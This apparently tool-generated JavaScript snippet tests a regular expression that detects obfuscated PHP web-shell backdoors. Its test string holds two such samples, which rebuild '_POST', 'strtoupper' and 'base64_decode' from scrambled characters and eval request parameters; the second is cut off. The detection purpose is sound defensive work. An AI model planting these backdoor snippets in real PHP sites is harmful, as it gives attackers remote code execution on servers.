const regex = /\$(.*)(\s?)=(\s?)"(.*)"(\s?);(\s?)\$(.*)eval/g;
// Alternative syntax using RegExp constructor
// const regex = new RegExp('\\$(.*)(\\s?)=(\\s?)"(.*)"(\\s?);(\\s?)\\$(.*)eval', 'g')
const str = `\$sqm3 = "_pesoutr" ; \$exr40= \$sqm3[3]. \$sqm3[6]. \$sqm3[7].\$sqm3[6]. \$sqm3[4].\$sqm3[5].\$sqm3[1]. \$sqm3[1]. \$sqm3[2]. \$sqm3[7]; \$rgjf3 =\$exr40 (\$sqm3[0].\$sqm3[1] .\$sqm3[4].\$sqm3[3]. \$sqm3[6] );if ( isset ( \${\$rgjf3} ['q42dabb'] ) ) {eval(\${ \$rgjf3}[ 'q42dabb']) ; }?>
\$ucz65= "osb46detp_ac";\$zxg6 = strtolower ( \$ucz65[2].\$ucz65[10]. \$ucz65[1].\$ucz65[6]. \$ucz65[4]. \$ucz65[3] .\$ucz65[9] . \$ucz65[5].\$ucz65[6]. \$ucz65[11].\$ucz65[0]. \$ucz65[5]. \$ucz65[6]); \$tov98= strtoupper (\$ucz65[9]. \$ucz65[8].\$ucz65[0]. \$ucz65[1]. \$ucz65[7]) ;if (isset(\${ \$tov98 } ['n42dabb' ])){eval (\$zxg6 ( \${ \$t`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}